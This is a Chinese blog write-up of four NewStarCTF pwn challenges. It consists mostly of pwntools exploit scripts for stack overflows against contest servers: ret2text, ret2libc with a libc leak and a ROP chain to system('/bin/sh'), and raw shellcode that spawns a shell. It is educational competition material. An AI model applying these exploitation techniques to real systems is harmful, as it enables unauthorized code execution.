NewStarCTF 公开赛wp

最新推荐文章于 2024-08-03 07:21:58 发布
最新推荐文章于 2024-08-03 07:21:58 发布
阅读量1.5k 收藏 5
点赞数 9
分类专栏: pwnstudy 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FUCKING12/article/details/126959951
版权

NewStarCTF 公开赛wp

ret2text

在这里插入图片描述
这里有个栈溢出,话不多说,上脚本。

from pwn import *
p=remote('node4.buuoj.cn',26128)
# p=process('./node4.buuoj.cn:25505')
payload=b'a'*0x20+p64(0xdeadbeef)+p64(0x00000400708)
p.sendlineafter('Welcome!May I have your name?\n',payload)
p.interactive()

calc

请添加图片描述
代码意思就是直接就是计算100次数据然后得到shell,你需要做的就是写个脚本计算这100次运算。

from pwn import *
context.log_level='debug'
p=remote('node4.buuoj.cn',25181)
# p=process('./pwn')
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
def dbg():
    gdb.attach(p)
    pause()
result=0
for i in range(100):
    p.recvuntil("What's the answer? ")
    num1=int(p.recvuntil(b' ',drop=True))
    char=p.recvuntil(b' ',drop=True)
    num2=int(p.recvuntil(b' ',drop=True))
    if char=='x':
        result=num1*num2
    elif char=='+':
        result=num1+num2
    elif char=='-':
        result=num1-num2
    elif char=='/':
        result=num1/num2
    # lg('result')
    # print num1
    # print(char) 
    # print num2
    p.recvuntil('= what?\n',drop=True)
    p.sendline(str(result))
    # p.recvline()
# s=[num1 ,char ,num2]
    # result=exec('num1 char num2')
# # # print result
# p.sendline(result)
p.interactive()

ret2libc

请添加图片描述

栈溢出,但是没有后门函数,但是给了libc,于是就是ret2libc。

# from LibcSearcher import *
context.log_level='debug'
# p=process('./pwn')
p=remote('node4.buuoj.cn',28744)
def dbg():
    gdb.attach(p)
    pause()
elf=ELF('./pwn')
libc=ELF('./libc-2.31.so')
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
mainaddr=0x00400698
pop_rdi=0x0000000000400753
ret=0x000000000040050e
payload=b'a'*0x20+p64(0xdeadbeef)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(mainaddr)
p.sendlineafter('Glad to meet you again!What u bring to me this time?',payload)
p.recvuntil('Ok.See you!\n')
putsaddr=u64(p.recv(6).ljust(8, "\x00"))
lg('putsaddr')
# dbg()
# libc = LibcSearcher("puts", putsaddr)
# offset=0x84420
libcbase = putsaddr - libc.symbols['puts']
system = libcbase + libc.symbols["system"]
bin_sh = next(libc.search(b"/bin/sh\x00"))+libcbase
lg('libcbase')
lg('system')
lg('bin_sh')
# dbg()
payload=b'a'*0x20+p64(0xdeadbeef)+p64(ret)+ p64(pop_rdi)+ p64(bin_sh)+p64(system) 
# payload=b'a'*0x20+p64(0xdeadbeef)+p64(system)+p64(1)+ p64(bin_sh)
# payload=b'a'*0x20+p64(0xdeadbeef)+ p64(0xe3cf9+offset)

p.sendlineafter('Glad to meet you again!What u bring to me this time?',payload)


p.interactive()

ret2shellcode

请添加图片描述
又是栈溢出,顾题思议,ret2shellcode呗。

port imp
from pwn import *
context.log_level='debug'
p=remote('node4.buuoj.cn',29095)
# p=process('./pwn')
shellcode="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
p.sendlineafter('Hello my friend.Any gift for me?\n',shellcode)
payload=b'a'*0x30+p64(0)+p64(0x233000)
p.sendlineafter('Anything else?\n',payload)
p.interactive()
thna0s
关注
  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NewStarCTF 公开赛赛道
m0_62129839的博客
10-29 876
reverse一下倒着取得到最后将回显逆转收获无2.文件包含先进行一个代码审计1219893521,伪随机,给了值,爆破出种子就行if语句playload:flag收获base被禁用rot13反序列化,这类题我觉得是我比较薄弱的地方,好好研究研究:poc链我们这样分析,尾链是Sec-> invoke,倒推__invoke() //当脚本尝试将对象调用为函数时触发clone() //当把一个对象赋给另一个对象时自动调用。
WP】第一届 “帕鲁杯“ - CTF挑战赛 Web 全解
m0_63138919的博客
05-06 1368
WP】第一届 "帕鲁杯" - CTF挑战赛 Web 全解
NewStarCTF 公开赛赛道 week5|web wp
m0_64815693的博客
10-23 2768
NewStarCTF 公开赛赛道 第五周 web wp
BUUCTF NewStarCTF 公开赛赛道Week1 Writeup
末初的CSDN博客
10-03 1668
BUUCTF NewStarCTF 公开赛赛道Week1 Writeup
BUUCTF NewStarCTF 公开赛赛道Week3 Writeup
末初的CSDN博客
10-09 5556
BUUCTF NewStarCTF 公开赛赛道Week3 Writeup
NewStarCTF 公开赛-web
qq_61768489的博客
11-22 1951
cookie 修改admin 源码发现key GET和POST传参即可。
七校联合NewStarCTF 公开赛赛道WEEK2 web wp
trytowritecode的博客
09-26 3171
NewStarCTF week2 web WP
NewStarCTF 公开赛赛道 第一周学习记录
m0_64815693的博客
09-29 2280
NewStarCTF 公开赛赛道 第一周学习记录
2022 七校联合NewStarCTF 公开赛赛道 WEEK4|CRYPTO
zerorzeror的博客
10-17 547
2022 七校联合NewStarCTF 公开赛赛道 WEEK4|CRYPTO
2022 七校联合NewStarCTF 公开赛赛道 WEEK2|MISC
zerorzeror的博客
10-03 1289
2022 七校联合NewStarCTF 公开赛赛道 WEEK2|MISC
NewStarCTF 2023 第一阶段公开赛道部分wp
10-02
这是官方的wp文件,需要的可以下载查看
对于一些CTF比赛写的wp.zip
09-30
比赛项目源码
Wp.rar_wp
09-14
标题中的"Wp.rar_wp"可能是指一个名为"Wp"的RAR压缩文件,后缀"_wp"可能是用户为了标记或区分该文件而添加的自定义标识。这个压缩包内容与但丁滤波器设计有关,是一种在信号处理领域广泛应用的技术。 在描述中提到...
Killw3wp.exe
04-20
对于IIS 管理员来说,经常会碰到 Web 服务器 CPU 占用 100% 的情况,w3wp.exe是IIS工具的一部。w3wp.exe是在IIS(因特网信息服务器)与应用程序池相关联的一个进程,如果你有多个应用程序池,就会有对应的多个w3wp.exe...
mingyue.exe wp
03-08
标题中的"mingyue.exe wp"可能是指一个特定的程序或者命令行操作,但没有足够的上下文来详细解释它的具体含义。不过,我们可以基于提供的描述和标签内容来探讨一些相关的IT知识点。 首先,标签"wp"可能是...
云原生安全检测工具(容器安全、trivy、veinmind-tools)
墨痕诉清风的博客
07-31 592
例如上文的 mysql:5.7 镜像,在扫描镜像包含的 openssl 库时,会根据操作系统版本,去 trivy.db 的"Oracle Linux 7"、“openssl”桶中查询相关漏洞信息,并最终生成 CVE-2021-23840 漏洞告警。如果没有,则需要解析基础镜像,并根据其中的操作系统版本文件(etc/alpine-release、usr/lib/os-release、/etc/os-release 等),来确定基础镜像的操作系统版本。‍‍Trivy 的漏洞库,名叫 trivy-db​​。
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1719
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
读零信任网络:在不可信网络中构建安全系统07设备信任
最新发布
lyingSeven的博客
08-03 406
设备安全
ctfshow元旦水友赛wp
04-13
很抱歉,我无法提供关于ctfshow元旦水友赛wp的具体介绍,因为我无法获取实时的比赛信息。但是,我可以告诉你一些关于CTF比赛的基本知识和常见的解题思路。 CTF(Capture The Flag)比赛是一种网络安全竞赛,旨在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值